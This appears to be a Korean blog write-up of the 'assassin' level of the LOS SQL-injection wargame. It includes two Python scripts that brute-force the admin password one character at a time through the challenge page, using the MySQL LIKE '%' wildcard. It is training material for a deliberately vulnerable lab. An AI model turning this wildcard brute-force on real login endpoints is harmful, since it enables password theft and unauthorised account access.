[LOS] prob_assassin

LOS 15번 문제인 assasin이다.

최근에 rubiya님이 닫혀버린 문제도 수정하고 다시 열었다는 소식을 들었기에 다시 시작해보았다.

---

---

mysql like에 '%'(percent) 와일드 카드를 사용하면 검색을 편리하게 할 수 있다.

(하지만 전문(FULL-TEXT) 검색보다 느리다는 단점이 있다고는 하는데 확인해본 바 없다)

% 기호 하나만 넣어서 검색하였다.

Hello guest라고 뜨는 것을 보아 admin 계정은 guest보다 후순위에 위치한다는 것을 알 수 있다.

테이블 구조를 추론해보자면

이런식이 되지 않을까 싶다. 이렇게 되면 당연히 검색할 때 guest 먼저 나오겠지.

가만 보니 또 툴을 짜야한다.

import requests, string import requests, string url = 'http://los.rubiya.kr/assassin_14a1fd552c61c60f034879e5d4171373.php' cookie = dict(PHPSESSID='bltncvgopq5u17j6jv6c0ptei1') key = '' for i in range(1, 9) : for strings in string.digits + string.ascii_letters : query = '?pw='+ key + str(strings) +'%' req = requests.get(url + query, cookies = cookie) print(url + query) if req.text.find('<h2>Hello admin</h2>') > 0 : key += strings break print(key)

---

코드는 이렇게 짰더니 의미 없는 루프만 돌았다.

여기서 의심해볼 수 있는 것은 guest와 admin의 비밀번호가 비슷하다는 것이다.  앞자리 몇 개는 비슷하기에 hello guest가 뜰 수 있다는 것.

조금 변형했다.

import requests, string url = 'http://los.rubiya.kr/assassin_14a1fd552c61c60f034879e5d4171373.php' cookie = dict(PHPSESSID='bltncvgopq5u17j6jv6c0ptei1') key = '' for i in range(1, 9) : for strings in string.digits + string.ascii_letters : query = '?pw='+ key + str(strings) +'%' req = requests.get(url + query, cookies = cookie) print(url + query) if req.text.find('<h2>Hello admin</h2>') > 0 : key += strings break if req.text.find('<h2>Hello guest</h2>') > 0 : key += strings break print(key)

---

아무리 같아도 언젠간 틀려지겠지.. 우선 guest의 키도 저장하되, admin을 우선하면 된다.

저걸 돌리면 뚝딱 하고 나온다.